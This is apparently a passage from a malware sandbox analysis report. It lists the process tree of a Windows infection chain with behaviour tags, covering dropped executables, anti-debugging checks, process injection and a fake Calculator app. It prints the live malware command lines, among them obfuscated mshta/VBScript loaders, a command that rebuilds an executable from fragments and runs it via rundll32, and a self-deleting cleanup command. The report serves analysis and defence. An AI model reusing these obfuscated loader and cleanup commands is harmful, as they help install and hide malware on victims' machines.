- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3740
-
-
C:\Users\Admin\AppData\Roaming\8907188.scr"C:\Users\Admin\AppData\Roaming\8907188.scr" /S6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5564
-
-
C:\Users\Admin\AppData\Roaming\1625681.scr"C:\Users\Admin\AppData\Roaming\1625681.scr" /S6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4484 -
C:\Users\Admin\AppData\Roaming\1625681.scr"C:\Users\Admin\AppData\Roaming\1625681.scr"7⤵PID:5652
-
-
-
C:\Users\Admin\AppData\Roaming\4540442.scr"C:\Users\Admin\AppData\Roaming\4540442.scr" /S6⤵PID:1172
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu1628aafb3efd7c3d.exe4⤵
- Suspicious use of WriteProcessMemory
PID:3176 -
C:\Users\Admin\AppData\Local\Temp\7zS429079F3\Thu1628aafb3efd7c3d.exeThu1628aafb3efd7c3d.exe5⤵
- Executes dropped EXE
PID:3408 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3408 -s 3086⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:4644
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu165bd34b1e1d4d81.exe4⤵PID:1816
-
C:\Users\Admin\AppData\Local\Temp\7zS429079F3\Thu165bd34b1e1d4d81.exeThu165bd34b1e1d4d81.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1068 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1068 -s 19926⤵
- Drops file in Windows directory
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:4748
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu16f3de88a335950bb.exe4⤵PID:2264
-
C:\Users\Admin\AppData\Local\Temp\7zS429079F3\Thu16f3de88a335950bb.exeThu16f3de88a335950bb.exe5⤵
- Executes dropped EXE
PID:1444 -
C:\Users\Admin\AppData\Local\Temp\is-ILAHR.tmp\Thu16f3de88a335950bb.tmp"C:\Users\Admin\AppData\Local\Temp\is-ILAHR.tmp\Thu16f3de88a335950bb.tmp" /SL5="$3017A,1570064,56832,C:\Users\Admin\AppData\Local\Temp\7zS429079F3\Thu16f3de88a335950bb.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2380 -
C:\Users\Admin\AppData\Local\Temp\7zS429079F3\Thu16f3de88a335950bb.exe"C:\Users\Admin\AppData\Local\Temp\7zS429079F3\Thu16f3de88a335950bb.exe" /SILENT7⤵
- Executes dropped EXE
PID:3400 -
C:\Users\Admin\AppData\Local\Temp\is-FGJHH.tmp\Thu16f3de88a335950bb.tmp"C:\Users\Admin\AppData\Local\Temp\is-FGJHH.tmp\Thu16f3de88a335950bb.tmp" /SL5="$4017A,1570064,56832,C:\Users\Admin\AppData\Local\Temp\7zS429079F3\Thu16f3de88a335950bb.exe" /SILENT8⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
PID:4852 -
C:\Users\Admin\AppData\Local\Temp\is-5OTNA.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-5OTNA.tmp\postback.exe" ss19⤵PID:4240
-
-
C:\Program Files (x86)\FarLabUninstaller\FarLabUninstaller.exe"C:\Program Files (x86)\FarLabUninstaller\FarLabUninstaller.exe" ss19⤵
- Executes dropped EXE
PID:3620 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://dateadult-contacts.com/?u=h2dp605&o=lxw09vh10⤵PID:6328
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x108,0x10c,0x110,0xdc,0x114,0x7ffca57246f8,0x7ffca5724708,0x7ffca572471811⤵PID:5092
-
-
-
-
C:\Program Files (x86)\FarLabUninstaller\NDP472-KB4054531-Web.exe"C:\Program Files (x86)\FarLabUninstaller\NDP472-KB4054531-Web.exe" /q /norestart9⤵
- Executes dropped EXE
PID:2264 -
C:\66cb58917ec17ad1527490e29caeec\Setup.exeC:\66cb58917ec17ad1527490e29caeec\\Setup.exe /q /norestart /x86 /x64 /web10⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4328
-
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu164ba03be19.exe4⤵PID:3384
-
C:\Users\Admin\AppData\Local\Temp\7zS429079F3\Thu164ba03be19.exeThu164ba03be19.exe5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1520 -
C:\Users\Admin\AppData\Local\Temp\7zS429079F3\Thu164ba03be19.exeC:\Users\Admin\AppData\Local\Temp\7zS429079F3\Thu164ba03be19.exe6⤵
- Executes dropped EXE
PID:1772
-
-
C:\Users\Admin\AppData\Local\Temp\7zS429079F3\Thu164ba03be19.exeC:\Users\Admin\AppData\Local\Temp\7zS429079F3\Thu164ba03be19.exe6⤵PID:2776
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu1653d94a8da.exe4⤵PID:4400
-
C:\Users\Admin\AppData\Local\Temp\7zS429079F3\Thu1653d94a8da.exeThu1653d94a8da.exe5⤵
- Executes dropped EXE
PID:2932 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ("CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\7zS429079F3\Thu1653d94a8da.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS429079F3\Thu1653d94a8da.exe"") do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )6⤵PID:3532
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\7zS429079F3\Thu1653d94a8da.exe" 09xU.exE &&STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\7zS429079F3\Thu1653d94a8da.exe") do taskkill /F -Im "%~NxU"7⤵PID:3340
-
C:\Users\Admin\AppData\Local\Temp\09xU.exE09xU.EXE -pPtzyIkqLZoCarb5ew8⤵
- Executes dropped EXE
PID:772 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ("CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If ""-pPtzyIkqLZoCarb5ew "" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"") do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )9⤵PID:4704
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\09xU.exE" 09xU.exE &&STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "-pPtzyIkqLZoCarb5ew " =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\09xU.exE") do taskkill /F -Im "%~NxU"10⤵PID:1944
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbScRipT: cloSE ( creAteobjECT ( "WscriPT.SHell" ). RuN ( "cMd.exE /Q /r eCHO | SET /P = ""MZ"" > ScMeAP.SU & CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I & StART control .\R6f7sE.I " ,0,TRuE) )9⤵PID:3412
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /r eCHO | SET /P = "MZ" > ScMeAP.SU &CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH +7TCInEJp.0 + yKIfDQA.1 r6f7sE.I& StART control .\R6f7sE.I10⤵PID:5852
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>ScMeAP.SU"11⤵PID:1788
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" eCHO "11⤵PID:3920
-
-
C:\Windows\SysWOW64\control.execontrol .\R6f7sE.I11⤵PID:1528
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\R6f7sE.I12⤵
- Loads dropped DLL
PID:1280 -
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\R6f7sE.I13⤵PID:1312
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\R6f7sE.I14⤵PID:5000
-
-
-
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F -Im "Thu1653d94a8da.exe"8⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:864
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu167d514d2a7ac5a.exe4⤵
- Suspicious use of WriteProcessMemory
PID:4212 -
C:\Users\Admin\AppData\Local\Temp\7zS429079F3\Thu167d514d2a7ac5a.exeThu167d514d2a7ac5a.exe5⤵
- Executes dropped EXE
PID:3108
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu16f584bd3686.exe4⤵
- Suspicious use of WriteProcessMemory
PID:2056
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu16466b26f8b7.exe4⤵
- Suspicious use of WriteProcessMemory
PID:1468
-
-
-
-
C:\Windows\System32\Upfc.exeC:\Windows\System32\Upfc.exe /launchtype periodic /cv 25y1SdoBZEKwsHgy6qEapg.01⤵PID:4640
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -s W32Time1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4128
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵
- Modifies data under HKEY_USERS
PID:2456
-
C:\Windows\System32\sihclient.exeC:\Windows\System32\sihclient.exe /cv pVzHgpXms02TJxnTGiup5w.0.21⤵
- Modifies data under HKEY_USERS
PID:3528
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:3960
-
C:\Users\Admin\AppData\Local\Temp\7zS429079F3\Thu16466b26f8b7.exeThu16466b26f8b7.exe1⤵
- Executes dropped EXE
PID:4296 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4296 -s 3082⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:3980
-
-
C:\Users\Admin\AppData\Local\Temp\7zS429079F3\Thu16f584bd3686.exeThu16f584bd3686.exe1⤵
- Executes dropped EXE
PID:4000
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:3184 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
PID:2532 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2532 -s 2123⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:1060
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 3332 -ip 33321⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4868
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 1068 -ip 10681⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2192
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 3408 -ip 34081⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4040
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 4296 -ip 42961⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4640
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 2532 -ip 25321⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2716
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 6120 -ip 61201⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2616
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 6132 -ip 61321⤵PID:4240
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 5272 -ip 52721⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5612
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 5700 -ip 57001⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1472
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 5300 -ip 53001⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2976
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 5428 -ip 54281⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2064
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 5492 -ip 54921⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6804
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 2452 -ip 24521⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3124
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 6048 -ip 60481⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6240
-
C:\Users\Admin\AppData\Local\Temp\EE1A.exeC:\Users\Admin\AppData\Local\Temp\EE1A.exe1⤵
- Suspicious use of SetThreadContext
PID:5512 -
C:\Users\Admin\AppData\Local\Temp\EE1A.exeC:\Users\Admin\AppData\Local\Temp\EE1A.exe2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:3380
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 4788 -ip 47881⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6208
-
C:\Users\Admin\AppData\Local\Temp\462.exeC:\Users\Admin\AppData\Local\Temp\462.exe1⤵
- Suspicious use of SetThreadContext
PID:4868 -
C:\Users\Admin\AppData\Local\Temp\462.exeC:\Users\Admin\AppData\Local\Temp\462.exe2⤵PID:1176
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 420 -p 6088 -ip 60881⤵PID:5464
-
C:\Users\Admin\AppData\Local\Temp\3769.exeC:\Users\Admin\AppData\Local\Temp\3769.exe1⤵PID:3104
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3104 -s 2362⤵
- Program crash
PID:5748
-
-
C:\Users\Admin\AppData\Local\Temp\4D35.exeC:\Users\Admin\AppData\Local\Temp\4D35.exe1⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1616
-
C:\Users\Admin\AppData\Local\Temp\6755.exeC:\Users\Admin\AppData\Local\Temp\6755.exe1⤵PID:7068
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7068 -s 2362⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:6296
-
-
C:\Users\Admin\AppData\Local\Temp\7A03.exeC:\Users\Admin\AppData\Local\Temp\7A03.exe1⤵PID:3148
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3148 -s 3002⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:2068
-
-
C:\Users\Admin\AppData\Local\Temp\8E29.exeC:\Users\Admin\AppData\Local\Temp\8E29.exe1⤵PID:1744
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1744 -s 2402⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:7024
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 3104 -ip 31041⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:7080
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 7068 -ip 70681⤵PID:4788
-
C:\Users\Admin\AppData\Local\Temp\9D1E.exeC:\Users\Admin\AppData\Local\Temp\9D1E.exe1⤵
- Suspicious use of SetThreadContext
PID:1468 -
C:\Windows\SysWOW64\explorer.exe"C:\Windows\SysWOW64\explorer.exe"2⤵PID:5020
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im explorer.exe /f & timeout /t 6 & del /f /q "C:\Windows\SysWOW64\explorer.exe" & del C:\ProgramData\*.dll & exit3⤵PID:5312
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im explorer.exe /f4⤵
- Kills process with taskkill
PID:4324
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 64⤵
- Delays execution with timeout.exe
PID:3348
-
-
-
-
C:\Windows\SysWOW64\explorer.exe"C:\Windows\SysWOW64\explorer.exe"2⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:6864
-
-
C:\Users\Admin\AppData\Local\Temp\A0B9.exeC:\Users\Admin\AppData\Local\Temp\A0B9.exe1⤵PID:804
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 3148 -ip 31481⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6100
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 1744 -ip 17441⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4808
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
- Modifies data under HKEY_USERS
PID:5904
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:3300
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
PID:6732 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding C21ACC666574A4894FBCB669CDE90FE8 C2⤵
- Loads dropped DLL
PID:1540
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 300F36DC215A0C52D0B34C13BB5A6DFE C2⤵
- Loads dropped DLL
PID:3604
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding D07123CDE91D24338EE2433C9A790E2D2⤵
- Blocklisted process makes network request
- Loads dropped DLL
PID:5044
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator\prerequisites\aipackagechainer.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator\prerequisites\aipackagechainer.exe"2⤵
- Adds Run key to start application
PID:3556 -
C:\Users\Admin\AppData\Roaming\Calculator\Calculator\prerequisites\RequiredApplication_1\Calculator%20Installation.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator\prerequisites\RequiredApplication_1\Calculator%20Installation.exe" -silent=1 -CID=764 -SID=764 -submn=default3⤵
- Loads dropped DLL
- Adds Run key to start application
PID:4268 -
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--DzBsjyZ8js"4⤵
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:6276 -
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x214,0x218,0x21c,0x1f0,0x220,0x7ffcaf8adec0,0x7ffcaf8aded0,0x7ffcaf8adee05⤵
- Loads dropped DLL
PID:5428
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1576,1214057349989469805,1657892559810768791,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6276_935835653" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1588 /prefetch:25⤵
- Loads dropped DLL
- Modifies registry class
PID:7028
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1576,1214057349989469805,1657892559810768791,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6276_935835653" --mojo-platform-channel-handle=1912 /prefetch:85⤵PID:5936
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1576,1214057349989469805,1657892559810768791,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6276_935835653" --mojo-platform-channel-handle=2068 /prefetch:85⤵PID:5412
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1576,1214057349989469805,1657892559810768791,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6276_935835653" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2456 /prefetch:15⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:6648
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1576,1214057349989469805,1657892559810768791,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6276_935835653" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2612 /prefetch:15⤵PID:4052
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1576,1214057349989469805,1657892559810768791,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6276_935835653" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3060 /prefetch:25⤵
- Modifies registry class
PID:4600
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1576,1214057349989469805,1657892559810768791,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6276_935835653" --mojo-platform-channel-handle=3536 /prefetch:85⤵PID:5768
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1576,1214057349989469805,1657892559810768791,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6276_935835653" --mojo-platform-channel-handle=3380 /prefetch:85⤵PID:7148
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1576,1214057349989469805,1657892559810768791,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6276_935835653" --mojo-platform-channel-handle=428 /prefetch:85⤵PID:3348
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1576,1214057349989469805,1657892559810768791,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6276_935835653" --mojo-platform-channel-handle=3404 /prefetch:85⤵PID:4088
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1576,1214057349989469805,1657892559810768791,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6276_935835653" --mojo-platform-channel-handle=2348 /prefetch:85⤵PID:6844
-
-
